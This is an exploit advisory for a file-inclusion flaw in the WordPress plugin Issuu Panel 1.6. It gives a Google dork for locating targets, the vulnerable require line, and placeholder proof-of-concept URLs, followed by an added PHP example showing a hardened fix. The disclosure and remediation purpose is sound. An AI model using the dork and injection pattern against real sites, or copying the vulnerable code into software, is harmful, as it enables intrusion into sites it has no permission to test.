WordPress Issuu Panel 1.6 Remote / Local File Inclusion

2016.03.24
Credit: CrashBandicot
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

# Exploit Title: Wordpress Plugin Issuu Panel - RFI & LFI
# Exploit Author: CrashBandicot
# Date: 2016-03-23
# Google Dork : inurl:/wp-content/plugins/issuu-panel/
# Vendor Homepage: https://wordpress.org/plugins/issuu-panel/
# Tested on: MsWIn
# Version: 1.6

# Vulnerable File : menu/documento/requests/ajax-docs.php

3. require($_GET['abspath'] . '/wp-load.php');

# PoC :

http://127.0.0.1/wordpress/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=[RFI]
http://127.0.0.1/wordpress/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=[LFI]
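
The require() call above with the request-controlled prefix removed, as an added example (not code from the advisory or from the plugin): the WordPress root is derived from the file's own location instead of the abspath parameter. The helper name issuu_example_find_wp_load and the depth limit of 8 are assumptions made for illustration.

```php
<?php
// Added example: hardened bootstrap for a plugin endpoint such as
// menu/documento/requests/ajax-docs.php. Not the plugin's own code.

// Vulnerable pattern from the advisory, kept as a comment for contrast:
//   require($_GET['abspath'] . '/wp-load.php');
// The path prefix comes from the request, so the caller chooses what is included.
// allow_url_include=Off (the PHP default) blocks only the remote case;
// the local case needs the code change below.

/**
 * Locate wp-load.php by walking up from a trusted directory.
 * Hypothetical helper: no request data influences the result.
 */
function issuu_example_find_wp_load(string $startDir, int $maxDepth = 8): ?string
{
    $dir = realpath($startDir);
    for ($i = 0; $dir !== false && $i < $maxDepth; $i++) {
        $candidate = $dir . DIRECTORY_SEPARATOR . 'wp-load.php';
        if (is_file($candidate)) {
            return $candidate;
        }
        $parent = dirname($dir);
        if ($parent === $dir) { // reached the filesystem root
            break;
        }
        $dir = $parent;
    }
    return null;
}

// __DIR__ is fixed by where this file lives on disk, not by the client.
$wpLoad = issuu_example_find_wp_load(__DIR__);
if ($wpLoad === null) {
    http_response_code(500);
    exit('WordPress bootstrap not found');
}
require_once $wpLoad;
```

In WordPress the more robust design is to register the handler on a wp_ajax_ action and serve it through admin-ajax.php, so the plugin file never bootstraps WordPress itself.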

